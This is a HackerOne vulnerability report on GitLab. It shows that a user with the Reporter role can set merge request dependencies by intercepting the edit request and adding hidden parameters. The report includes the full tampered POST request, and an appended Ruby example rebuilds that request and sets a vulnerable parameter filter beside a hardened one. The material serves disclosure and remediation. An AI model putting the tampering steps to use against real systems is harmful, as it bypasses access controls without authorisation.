Reporter Able to Edit Merge Request Dependencies

HackerOne report #743339 by rafiem on 2019-11-21, assigned to @jeremymatos:

Hi Team,

I have found an improper access control issue in the GitLab merge request system. There is a new feature in merge requests, merge request dependencies. This setting makes the MR being edited unmergeable until the dependency MRs have been merged. Even though I did not find a specific permission rule for merge request dependencies, I am sure this setting should only be editable by users with at least the Developer role (the same as editing assignees and labels). In this case, a user with the Reporter role is able to change and edit the merge request dependencies.

Proof of Concept

1.) User A has a public or private project (in this report I use: https://gitlab.com/bambangyera/mokil)
2.) User A adds some branches to it
3.) User A then creates a random MR
4.) User A invites User B to the project as Reporter
5.) User B then creates an MR from the branch
6.) User B then tries to edit the MR he/she created (in this report I use: bambangyera/mokil!4)
7.) As we can see, there is no option for editing the MR dependencies
8.) User B then turns on Burp Suite and intercepts the request for editing the MR
9.) In the body of the POST request, add the parameter merge_request%5Bblocking_merge_request_references%5D%5B%5D with the URL of the dependency MR as its value, and the parameter merge_request%5Bupdate_blocking_merge_request_refs%5D with the value true:

POST /bambangyera/mokil/merge_requests/4 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 362  
Cache-Control: max-age=0  
Origin: https://gitlab.com  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36  
Sec-Fetch-User: ?1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Referer: https://gitlab.com/bambangyera/mokil/merge_requests/4/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: <REDACTED>

utf8=%E2%9C%93&_method=patch&authenticity_token=REDACTED2%3D%3D&merge_request%5Btarget_branch%5D=test&merge_request%5Btitle%5D=POC&merge_request%5Bdescription%5D=aaaaaaa&merge_request%5Bapprovals_before_merge%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=4&merge_request%5Bblocking_merge_request_references%5D%5B%5D=https%3A%2F%2Fgitlab.com%2Fbambangyera%2Fmokil%2Fmerge_requests%2F1&merge_request%5Bupdate_blocking_merge_request_refs%5D=true  
10.) Forward the request
11.) As a result, the MR dependency is added to the MR being edited, even though the user (Reporter role) does not have or see the option when editing the MR

PoC video attached: PoC.webm

Impact

A user with the Reporter role is able to edit MR dependencies.

Best Regards,
[@]rafiem
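The following Ruby is an added example and is not part of the report or of GitLab's own code. It models the two halves of the finding: the client side, where the benign edit-form body from step 9 is rebuilt with the two hidden dependency parameters appended (what the reporter did by hand in Burp), and the server side, where a vulnerable "accept every merge_request[...] field the caller sends" filter is placed beside a hardened one that checks the caller's role per field. The role numbers are GitLab's documented access levels (Guest 10, Reporter 20, Developer 30, Maintainer 40); which fields count as Developer-only is an assumption taken from the reporter's claim, not from GitLab's source, and the trimmed request body is constructed from the one in the report.

```ruby
require 'uri'

# GitLab's documented access levels, used to compare roles.
ROLE_LEVEL = { guest: 10, reporter: 20, developer: 30, maintainer: 40 }.freeze

# Assumption for this example: the two parameters injected in the PoC should
# need at least Developer access; every other merge_request[...] field stays
# editable by the MR author. This split is hypothetical, not GitLab's rule set.
DEVELOPER_ONLY = %w[
  merge_request[blocking_merge_request_references][]
  merge_request[update_blocking_merge_request_refs]
].freeze

# Constructed sample: the PATCH body the edit form submits for a Reporter who
# sees no dependency control (trimmed from the body shown in the report).
BENIGN_BODY = 'utf8=%E2%9C%93&_method=patch&authenticity_token=REDACTED' \
              '&merge_request%5Btarget_branch%5D=test&merge_request%5Btitle%5D=POC' \
              '&merge_request%5Bdescription%5D=aaaaaaa&merge_request%5Block_version%5D=4'

# Decode an application/x-www-form-urlencoded body into name => [values],
# keeping repeated names (Rails "[]" array params) as multiple values.
def parse_form(body)
  URI.decode_www_form(body)
     .group_by(&:first)
     .transform_values { |pairs| pairs.map(&:last) }
end

# Step 9 of the PoC: append the hidden dependency parameters to the intercepted
# body, exactly as a proxy user would, and re-encode it.
def tamper(body, blocking_mr_url)
  pairs = URI.decode_www_form(body)
  pairs << ['merge_request[blocking_merge_request_references][]', blocking_mr_url]
  pairs << ['merge_request[update_blocking_merge_request_refs]', 'true']
  URI.encode_www_form(pairs)
end

# Vulnerable behaviour as reported: once the caller may edit the MR at all
# (a Reporter who authored it can), every merge_request[...] field is accepted.
# The role is never consulted, so the hidden UI control is the only "check".
def permitted_params_vulnerable(params, _role)
  params.select { |k, _| k.start_with?('merge_request[') }
end

# Hardened variant (illustrative): authorise field by field, dropping the
# Developer-only parameters when the caller's role is below Developer.
def permitted_params_hardened(params, role)
  level = ROLE_LEVEL.fetch(role)
  params.select do |k, _|
    k.start_with?('merge_request[') &&
      (level >= ROLE_LEVEL[:developer] || !DEVELOPER_ONLY.include?(k))
  end
end

if $PROGRAM_NAME == __FILE__
  body = tamper(BENIGN_BODY, 'https://gitlab.com/bambangyera/mokil/merge_requests/1')
  params = parse_form(body)
  puts "vulnerable (reporter): #{permitted_params_vulnerable(params, :reporter).keys}"
  puts "hardened   (reporter): #{permitted_params_hardened(params, :reporter).keys}"
  puts "hardened   (developer): #{permitted_params_hardened(params, :developer).keys}"
end
```

The point the comparison makes is the one the report turns on: hiding a control in the edit form is not authorisation. Whatever the form omits, the update handler still receives, so the permission decision for each field has to be made where the parameters are consumed, using the caller's role rather than the shape of the request.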

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • PoC.webm
Edited Nov 25, 2019 by Jeremy Matos